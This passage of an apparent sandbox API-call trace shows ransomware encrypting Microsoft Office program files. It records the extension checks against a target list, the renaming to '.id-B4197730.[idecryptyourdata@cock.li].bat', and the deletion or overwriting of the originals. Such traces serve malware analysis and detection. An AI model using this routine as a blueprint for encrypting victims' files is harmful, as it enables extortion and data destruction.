nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x80e56, lpOverlapped=0x0) returned 1 [0059.629] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x80e60, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x80e60, lpOverlapped=0x0) returned 1 [0059.637] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0059.637] WriteFile (in: hFile=0x370, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x13e, lpOverlapped=0x0) returned 1 [0059.637] SetEndOfFile (hFile=0x370) returned 1 [0059.637] CloseHandle (hObject=0x370) returned 1 [0059.648] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0059.648] SetEndOfFile (hFile=0x354) returned 1 [0059.653] CloseHandle (hObject=0x354) returned 1 [0059.653] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0059.653] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-012a-0000-1000-0000000ff1ce.xml")) returned 1 [0059.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.654] lstrlenW (lpString=".doc") returned 4 [0059.654] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString=".docx") returned 5 [0059.654] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.654] lstrlenW (lpString=".pdf") returned 4 [0059.654] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString=".xls") returned 4 [0059.654] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString=".xlsx") returned 5 [0059.654] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.654] lstrlenW (lpString=".ppt") returned 4 [0059.654] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.654] lstrlenW (lpString=".zip") returned 4 [0059.654] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.654] lstrlenW (lpString=".rar") returned 4 [0059.654] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString=".bz2") returned 4 [0059.654] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString=".7z") returned 3 [0059.654] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.654] lstrlenW (lpString=".dbf") returned 4 [0059.654] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.654] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.654] lstrlenW (lpString=".1cd") returned 4 [0059.655] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString=".jpg") returned 4 [0059.655] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString=".doc") returned 4 [0059.655] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString=".docx") returned 5 [0059.655] lstrcmpiW (lpString1=".docx", lpString2="E.xml") returned -1 [0059.655] lstrlenW (lpString=".pdf") returned 4 [0059.655] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString=".xls") returned 4 [0059.655] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString=".xlsx") returned 5 [0059.655] lstrcmpiW (lpString1=".xlsx", lpString2="E.xml") returned -1 [0059.655] lstrlenW (lpString=".ppt") returned 4 [0059.655] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString=".zip") returned 4 [0059.655] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0059.655] lstrlenW (lpString=".rar") returned 4 [0059.655] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString=".bz2") returned 4 [0059.655] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString=".7z") returned 3 [0059.655] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString=".dbf") returned 4 [0059.655] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString=".1cd") returned 4 [0059.655] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0059.655] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-012A-0000-1000-0000000FF1CE.xml") returned 104 [0059.655] lstrlenW (lpString=".jpg") returned 4 [0059.656] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0059.656] lstrcmpiW (lpString1=".xml", lpString2=".bat") returned 1 [0059.656] lstrlenW (lpString="AppXManifest.common.xml") returned 23 [0059.656] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.656] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=2173046) returned 1 [0059.656] CloseHandle (hObject=0x354) returned 1 [0059.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml")) returned 0x220 [0059.656] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0059.656] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 1 [0059.657] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.common.xml.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0059.657] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc64 | out: lpNewFilePointer=0x0) returned 1 [0059.657] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc24 | out: lpNewFilePointer=0x0) returned 1 [0059.657] ReadFile (in: hFile=0x354, lpBuffer=0x38b3058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a8fc30, lpOverlapped=0x0 | out: lpBuffer=0x38b3058*, lpNumberOfBytesRead=0x2a8fc30*=0x40000, lpOverlapped=0x0) returned 1 [0059.701] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0xb0d7c, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc24 | out: lpNewFilePointer=0x0) returned 1 [0059.701] ReadFile (in: hFile=0x354, lpBuffer=0x38f3058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a8fc30, lpOverlapped=0x0 | out: lpBuffer=0x38f3058*, lpNumberOfBytesRead=0x2a8fc30*=0x40000, lpOverlapped=0x0) returned 1 [0059.976] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2a8fc64 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.976] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x1d2876, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc24 | out: lpNewFilePointer=0x0) returned 1 [0059.976] ReadFile (in: hFile=0x354, lpBuffer=0x3933058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2a8fc30, lpOverlapped=0x0 | out: lpBuffer=0x3933058*, lpNumberOfBytesRead=0x2a8fc30*=0x40000, lpOverlapped=0x0) returned 1 [0060.269] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0060.269] WriteFile (in: hFile=0x354, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xc011a, lpNumberOfBytesWritten=0x2a8fca8, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fca8*=0xc011a, lpOverlapped=0x0) returned 1 [0060.282] SetEndOfFile (hFile=0x354) returned 1 [0060.282] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x43910d8 [0060.282] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc74 | out: lpNewFilePointer=0x0) returned 1 [0060.282] WriteFile (in: hFile=0x354, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a8fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x2a8fc80*=0x40000, lpOverlapped=0x0) returned 1 [0060.284] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0xb0d7c, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc74 | out: lpNewFilePointer=0x0) returned 1 [0060.284] WriteFile (in: hFile=0x354, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a8fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x2a8fc80*=0x40000, lpOverlapped=0x0) returned 1 [0060.744] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x1d2876, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fc74 | out: lpNewFilePointer=0x0) returned 1 [0060.744] WriteFile (in: hFile=0x354, lpBuffer=0x43910d8*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2a8fc80, lpOverlapped=0x0 | out: lpBuffer=0x43910d8*, lpNumberOfBytesWritten=0x2a8fc80*=0x40000, lpOverlapped=0x0) returned 1 [0060.746] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x43910d8 | out: hHeap=0x5d0000) returned 1 [0060.748] CloseHandle (hObject=0x354) returned 1 [0062.113] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.113] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.113] lstrlenW (lpString=".doc") returned 4 [0062.113] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0062.113] lstrlenW (lpString=".docx") returned 5 [0062.113] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0062.113] lstrlenW (lpString=".pdf") returned 4 [0062.113] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0062.113] lstrlenW (lpString=".xls") returned 4 [0062.113] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0062.113] lstrlenW (lpString=".xlsx") returned 5 [0062.114] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0062.114] lstrlenW (lpString=".ppt") returned 4 [0062.114] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0062.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.114] lstrlenW (lpString=".zip") returned 4 [0062.114] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0062.114] lstrlenW (lpString=".rar") returned 4 [0062.114] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0062.114] lstrlenW (lpString=".bz2") returned 4 [0062.114] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0062.114] lstrlenW (lpString=".7z") returned 3 [0062.114] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0062.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.114] lstrlenW (lpString=".dbf") returned 4 [0062.114] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0062.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.114] lstrlenW (lpString=".1cd") returned 4 [0062.114] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0062.114] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.114] lstrlenW (lpString=".jpg") returned 4 [0062.114] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.115] lstrlenW (lpString=".doc") returned 4 [0062.115] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString=".docx") returned 5 [0062.115] lstrcmpiW (lpString1=".docx", lpString2="n.xml") returned -1 [0062.115] lstrlenW (lpString=".pdf") returned 4 [0062.115] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString=".xls") returned 4 [0062.115] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString=".xlsx") returned 5 [0062.115] lstrcmpiW (lpString1=".xlsx", lpString2="n.xml") returned -1 [0062.115] lstrlenW (lpString=".ppt") returned 4 [0062.115] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.115] lstrlenW (lpString=".zip") returned 4 [0062.115] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0062.115] lstrlenW (lpString=".rar") returned 4 [0062.115] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString=".bz2") returned 4 [0062.115] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString=".7z") returned 3 [0062.115] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0062.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.115] lstrlenW (lpString=".dbf") returned 4 [0062.115] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.115] lstrlenW (lpString=".1cd") returned 4 [0062.115] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0062.115] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.common.xml") returned 74 [0062.115] lstrlenW (lpString=".jpg") returned 4 [0062.115] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0062.116] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.116] lstrlenW (lpString="AN04108_.WMF") returned 12 [0062.116] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.116] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=2344) returned 1 [0062.116] CloseHandle (hObject=0x354) returned 1 [0062.116] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf")) returned 0x220 [0062.117] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0062.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.117] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.117] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.117] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c8 [0062.117] GetLastError () returned 0x0 [0062.117] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x928, lpOverlapped=0x0) returned 1 [0062.147] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0x930, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0x930, lpOverlapped=0x0) returned 1 [0062.148] ReadFile (in: hFile=0x354, lpBuffer=0x38b3020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2a8fecc, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesRead=0x2a8fecc*=0x0, lpOverlapped=0x0) returned 1 [0062.148] WriteFile (in: hFile=0x2c8, lpBuffer=0x38b3020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2a8fc94, lpOverlapped=0x0 | out: lpBuffer=0x38b3020*, lpNumberOfBytesWritten=0x2a8fc94*=0xec, lpOverlapped=0x0) returned 1 [0062.149] SetEndOfFile (hFile=0x2c8) returned 1 [0062.149] CloseHandle (hObject=0x2c8) returned 1 [0062.149] SetFilePointerEx (in: hFile=0x354, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a8fec0 | out: lpNewFilePointer=0x0) returned 1 [0062.149] SetEndOfFile (hFile=0x354) returned 1 [0062.150] CloseHandle (hObject=0x354) returned 1 [0062.150] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0062.151] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04108_.wmf")) returned 1 [0062.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.151] lstrlenW (lpString=".doc") returned 4 [0062.151] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.151] lstrlenW (lpString=".docx") returned 5 [0062.151] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.151] lstrlenW (lpString=".pdf") returned 4 [0062.151] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.151] lstrlenW (lpString=".xls") returned 4 [0062.151] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.151] lstrlenW (lpString=".xlsx") returned 5 [0062.151] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.151] lstrlenW (lpString=".ppt") returned 4 [0062.151] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.151] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.152] lstrlenW (lpString=".zip") returned 4 [0062.152] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.152] lstrlenW (lpString=".rar") returned 4 [0062.152] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString=".bz2") returned 4 [0062.152] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString=".7z") returned 3 [0062.152] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.152] lstrlenW (lpString=".dbf") returned 4 [0062.152] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.152] lstrlenW (lpString=".1cd") returned 4 [0062.152] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.152] lstrlenW (lpString=".jpg") returned 4 [0062.152] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.152] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.152] lstrlenW (lpString=".doc") returned 4 [0062.152] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString=".docx") returned 5 [0062.152] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0062.152] lstrlenW (lpString=".pdf") returned 4 [0062.152] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0062.152] lstrlenW (lpString=".xls") returned 4 [0062.152] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0062.153] lstrlenW (lpString=".xlsx") returned 5 [0062.153] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0062.153] lstrlenW (lpString=".ppt") returned 4 [0062.153] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0062.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.153] lstrlenW (lpString=".zip") returned 4 [0062.153] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0062.153] lstrlenW (lpString=".rar") returned 4 [0062.153] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0062.153] lstrlenW (lpString=".bz2") returned 4 [0062.153] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0062.153] lstrlenW (lpString=".7z") returned 3 [0062.153] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0062.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.153] lstrlenW (lpString=".dbf") returned 4 [0062.153] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0062.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.153] lstrlenW (lpString=".1cd") returned 4 [0062.153] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0062.153] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04108_.WMF") returned 68 [0062.153] lstrlenW (lpString=".jpg") returned 4 [0062.153] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0062.153] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0062.153] lstrlenW (lpString="AN04174_.WMF") returned 12 [0062.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0062.154] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x2a8ff14 | out: lpFileSize=0x2a8ff14*=2636) returned 1 [0062.154] CloseHandle (hObject=0x354) returned 1 [0062.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\AN04174_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\an04174_.wmf")) returned 0x220 [0062.154] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft 